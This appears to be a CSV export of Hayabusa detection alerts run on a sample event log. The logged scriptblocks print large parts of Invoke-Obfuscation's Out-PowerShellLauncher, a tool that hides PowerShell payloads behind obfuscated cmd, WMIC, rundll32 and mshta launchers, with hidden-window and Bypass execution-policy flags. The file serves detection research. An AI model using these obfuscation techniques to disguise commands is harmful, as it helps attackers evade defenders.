<@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. 
Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. 
.EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. 
$ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. 
For all other tokens apply double layer escaping (^^^). If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. 
$PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. # This is to pr",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-PowerShellLauncher { <# .SYNOPSIS Applies launch syntax to PowerShell command so it can be run from cmd.exe and have its command line arguments further obfuscated via launch obfuscation techniques. Invoke-Obfuscation Function: Out-PowerShellLauncher Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (used for WMIC launcher -- located in Out-ObfuscatedStringCommand.ps1), Out-ConcatenatedString (used for WMIC and MSHTA launchers -- located in Out-ObfuscatedTokenCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-PowerShellLauncher obfuscates a given PowerShell command (via stdin, process-level environment variables, clipboard, etc.) while wrapping it in syntax to be launched directly from cmd.exe. Some techniques also push command line arguments to powershell.exe's parent (denoted with +) or even grandparent (denoted with ++) process command line arguments. 1 --> PS 2 --> CMD 3 --> WMIC 4 --> RUNDLL 5 --> VAR+ 6 --> STDIN+ 7 --> CLIP+ 8 --> VAR++ 9 --> STDIN++ 10 --> CLIP++ 11 --> RUNDLL++ 12 --> MSHTA++ .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER LaunchType Specifies the launch syntax to apply to ScriptBlock. .PARAMETER NoExit Outputs the option to not exit after running startup commands. 
.PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER SwitchesAsString (Optional) Specifies above PowerShell execution flags per a single string. .EXAMPLE C:\PS> Out-PowerShellLauncher -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive 3 C:\windows\SYstEM32\cmd.EXe /C ""sET oPUWV=Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green&& POWErshELl -NOnINt -noPrOfil ${eX`eCUti`on`cO`NTeXT}.\""INVO`k`e`coMMANd\"".\""INvo`KeS`C`RIPt\""( ( GET-CHI`Ldit`EM EnV:OPuwV ).\""v`AlUE\"" )"" .NOTES This cmdlet is an ideal last step after applying other obfuscation cmdlets to your script block or file path contents. Its more advanced obfuscation options are included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent or grandparent process' command line arguments. There are additional techniques to split the command contents cross multiple commands and have the final PowerShell command re-assemble in memory and execute that are not currently included in this version. 
This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'ScriptBlock')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [ValidateSet(1,2,3,4,5,6,7,8,9,10,11,12)] [Int] $LaunchType, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Parameter(Position = 2)] [String] $SwitchesAsString ) # To capture and output args in a process tree format for the applied launcher syntax. $ArgsDefenderWillSee = @() # Convert ScriptBlock to a String. $ScriptString = [String]$ScriptBlock # Check and throw warning message if input $ScriptString contains new line characters. If($ScriptString.Contains([Char]13+[Char]10)) { Write-Host """" Write-Warning ""Current script content contains newline characters.`n Applying a launcher will not work on the command line.`n Apply ENCODING obfuscation before applying LAUNCHER."" Start-Sleep 1 Return $ScriptString } # $SwitchesAsString argument for passing in flags from user input in Invoke-Obfuscation. 
If($SwitchesAsString.Length -gt 0) { If(!($SwitchesAsString.Contains('0'))) { $SwitchesAsString = ([Char[]]$SwitchesAsString | Sort-Object -Unique -Descending) -Join ' ' ForEach($SwitchAsString in $SwitchesAsString.Split(' ')) { Switch($SwitchAsString) { '1' {$NoExit = $TRUE} '2' {$NonInteractive = $TRUE} '3' {$NoLogo = $TRUE} '4' {$NoProfile = $TRUE} '5' {$Command = $TRUE} '6' {$WindowsStyle = 'Hidden'} '7' {$ExecutionPolicy = 'Bypass'} '8' {$Wow64 = $TRUE} default {Write-Error ""An invalid `$SwitchAsString value ($SwitchAsString) was passed to switch block for Out-PowerShellLauncher""; Exit;} } } } } # Parse out and escape key characters in particular token types for powershell.exe (in reverse to make indexes simpler for escaping tokens). $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $CharsToEscape = @('&','|','<','>') For($i=$Tokens.Count-1; $i -ge 0; $i--) { $Token = $Tokens[$i] # Manually extract token since tokenization will remove certain characters and whitespace which we want to retain. $PreTokenStr = $ScriptString.SubString(0,$Token.Start) $ExtractedToken = $ScriptString.SubString($Token.Start,$Token.Length) $PostTokenStr = $ScriptString.SubString($Token.Start+$Token.Length) # Escape certain characters that will be problematic on the command line for powershell.exe (\) and cmd.exe (^). # Single cmd escaping (^) for strings encapsulated by double quotes. For all other tokens apply double layer escaping (^^^). 
If($Token.Type -eq 'String' -AND !($ExtractedToken.StartsWith(""'"") -AND $ExtractedToken.EndsWith(""'""))) { ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^$Char"")} } If($ExtractedToken.Contains('\')) {$ExtractedToken = $ExtractedToken.Replace('\','\\')} If($ExtractedToken.Contains('""')) {$ExtractedToken = '\""' + $ExtractedToken.SubString(1,$ExtractedToken.Length-1-1) + '\""'} } Else { # Before adding layered escaping for special characters for cmd.exe, preserve escaping of ^ used NOT as an escape character (like as part of an Empire key). If($ExtractedToken.Contains('^')) { $ExtractedTokenSplit = $ExtractedToken.Split('^') $ExtractedToken = '' For($j=0; $j -lt $ExtractedTokenSplit.Count; $j++) { $ExtractedToken += $ExtractedTokenSplit[$j] $FirstCharFollowingCaret = $ExtractedTokenSplit[$j+1] If(!$FirstCharFollowingCaret -OR ($CharsToEscape -NotContains $FirstCharFollowingCaret.SubString(0,1)) -AND ($j -ne $ExtractedTokenSplit.Count-1)) { $ExtractedToken += '^^^^' } } } ForEach($Char in $CharsToEscape) { If($ExtractedToken.Contains($Char)) {$ExtractedToken = $ExtractedToken.Replace($Char,""^^^$Char"")} } } # Add $ExtractedToken back into context in $ScriptString $ScriptString = $PreTokenStr + $ExtractedToken + $PostTokenStr } # Randomly select PowerShell execution flag argument substrings and randomize the order for all flags passed to this function. # This is to prevent the Blue Team from placing false hope in simple signatures for the shortest form of these arguments or consistent ordering. 
$PowerShellFlags = New-Object String[](0) If($PSBoundParameters['NoExit'] -OR $NoExit) { $FullArgument = ""-NoExit"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile'] -OR $NoProfile) { $FullArgument = ""-NoProfile"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive'] -OR $NonInteractive) { $FullArgument = ""-NonInteractive"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo'] -OR $NoLogo) { $FullArgument = ""-NoLogo"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to overwrite the WindowStyle value with the corresponding integer representation of the predefined parameter value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the command-line arguments. 
# This is to pr",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.296 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"event the Blue Team from placing false hope in simple signatures for consistent ordering of these arguments. If($PowerShellFlags.Count -gt 1) { $PowerShellFlags = Get-Random -InputObject $PowerShellFlags -Count $PowerShellFlags.Count } # If selected then the -Command flag needs to be added last. If($PSBoundParameters['Command'] -OR $Command) { $FullArgument = ""-Command"" $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Insert random-length whitespace between all command-line arguments. # Maintain array of PS flags for some launch types (namely CLIP+, CLIP++ and RunDll32). $PowerShellFlagsArray = $PowerShellFlags $PowerShellFlags = ($PowerShellFlags | ForEach-Object {$_ + ' '*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $PowerShellFlags = ' '*(Get-Random -Minimum 1 -Maximum 3) + $PowerShellFlags + ' '*(Get-Random -Minimum 1 -Maximum 3) # Build out paths to binaries depending if 32-bit or 64-bit options were selected. 
$System32Path = $Env:ComSpec.SubString(0,$Env:ComSpec.LastIndexOf('\')) $PathToRunDll = Get-Random -Input @(""$System32Path\rundll32"" , ""$System32Path\rundll32.exe"" , ""rundll32"" , ""rundll32.exe"") $PathToMshta = Get-Random -Input @(""$System32Path\mshta"" , ""$System32Path\mshta.exe"" , ""mshta"" , ""mshta.exe"") $PathToCmd = Get-Random -Input @(""$System32Path\cmd"" , ""$System32Path\cmd.exe"" , ""cmd.exe"" , ""cmd"") $PathToClip = Get-Random -Input @(""$System32Path\clip"" , ""$System32Path\clip.exe"" , ""clip"" , ""clip.exe"") $PathToWmic = Get-Random -Input @(""$System32Path\WBEM\wmic"" , ""$System32Path\WBEM\wmic.exe"" , ""wmic"" , ""wmic.exe"") # If you use cmd or cmd.exe instead of the pathed version, then you don't need to put a whitespace between cmd and and cmd flags. E.g. cmd/c or cmd.exe/c. If($PathToCmd.Contains('\')) { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 2 -Maximum 4) } Else { $PathToCmd = $PathToCmd + ' '*(Get-Random -Minimum 0 -Maximum 4) } If($PSBoundParameters['Wow64'] -OR $Wow64) { $PathToPowerShell = ""$($Env:WinDir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$PathToPowerShell = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe"" $PathToPowerShell = ""powershell"" } # Randomize the case of the following variables. 
$PowerShellFlags = ([Char[]]$PowerShellFlags.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToPowerShell = ([Char[]]$PathToPowerShell.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToRunDll = ([Char[]]$PathToRunDll.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToMshta = ([Char[]]$PathToMshta.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToCmd = ([Char[]]$PathToCmd.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToClip = ([Char[]]$PathToClip.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $PathToWmic = ([Char[]]$PathToWmic.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $SlashC = ([Char[]]'/c'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' $Echo = ([Char[]]'echo'.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Show warning if an uneven number of double-quotes exists for any $LaunchType. $NumberOfDoubleQuotes = $ScriptString.Length-$ScriptString.Replace('""','').Length If($NumberOfDoubleQuotes%2 -eq 1) { Write-Host """" Write-Warning ""This command contains an unbalanced number of double quotes ($NumberOfDoubleQuotes).`n Try applying STRING or ENCODING obfuscation options first to encode the double quotes.`n"" Start-Sleep 1 Return $ScriptString } # If no $LaunchType is specified then randomly choose from options 3-20. 
If($LaunchType -eq 0) { $LaunchType = Get-Random -Input @(3..12) } # Select launcher syntax. Switch($LaunchType) { 1 { ######## ## PS ## ######## # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToPowerShell + $PSCmdSyntax } 2 { ######### ## CMD ## ######### # Undo some escaping from beginning of function. ForEach($Char in $CharsToEscape) { If($ScriptString.Contains(""^^^$Char"")) {$ScriptString = $ScriptString.Replace(""^^^$Char"",$Char)} If($ScriptString.Contains(""^$Char"")) {$ScriptString = $ScriptString.Replace(""^$Char"",""^^^$Char"")} } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Build out command line syntax in reverse so we can display the process argument tree at the end of this Switch block. $PSCmdSyntax = $PowerShellFlags + '""' + $ScriptString + '""' $CmdSyntax = $SlashC + ' '*(Get-Random -Minimum 0 -Maximum 4) + $PathToPowerShell + $PSCmdSyntax # Set argument info for process tree output after this Switch block. $ArgsDefenderWillSee += , @($PathToCmd , $CmdSyntax) $ArgsDefenderWillSee += , @($PathToPowerShell, $PSCmdSyntax) $CmdLineOutput = $PathToCmd + $CmdSyntax } 3 { ########## ## WMIC ## ########## # WMIC errors when variables contain more than 2 adjacent whitespaces in variable names. Thus we are escaping them here. 
For($i=1; $i -le 12; $i++) { $StringToReplace = '${' + ' '*$i + '}' If($ScriptString.Contains($StringToReplace)) { $ScriptString = $ScriptString.Replace($StringToReplace,$StringToReplace.Replace(' ','\ ')) } } # Undo escaping from beginning of function. $CharsToEscape is defined at beginning of this function. ForEach($Char in $CharsToEscape) { While($ScriptString.Contains('^' + $Char)) { $ScriptString = $ScriptString.Replace(('^' + $Char),$Char) } } If($ScriptString.Contains('^^^^')) { $ScriptString = $ScriptString.Replace('^^^^','^') } # Perform inline substitutions to remove commas from command line for wmic.exe. If($ScriptString.Contains(',')) { # SetVariables will only be used if more than 5 double quotes or more than 5 commas need to be escaped. $SetVariables = '' # Since we are converting the PowerShell command into strings for concatenation we need to escape and double-escape $ for proper variable interpretation by PowerShell. If($ScriptString.Contains('$')) { $ScriptString = $ScriptString.Replace('$','`$') # Double escape any $ characters that were already escaped prior to above escaping step. If($ScriptString.Contains('``$')) { $ScriptString = $ScriptString.Replace('``$','```$') } } # Double escape any escaped "" characters. If($ScriptString.Contains('`""')) { $ScriptString = $ScriptString.Replace('`""','``""') } # Substitute double quotes as well if we're substituting commas as this requires treating the entire command as a string by encapsulating it with double quotes. If($ScriptString.Contains('""')) { # Remove all layers of escaping for double quotes as they are no longer necessary since we're casting these double quotes to ASCII values. While($ScriptString.Contains('\""')) { $ScriptString = $ScriptString.Replace('\""','""') } # Randomly select a syntax for the Char conversion of a double quote ASCII value and then ramdomize the case. 
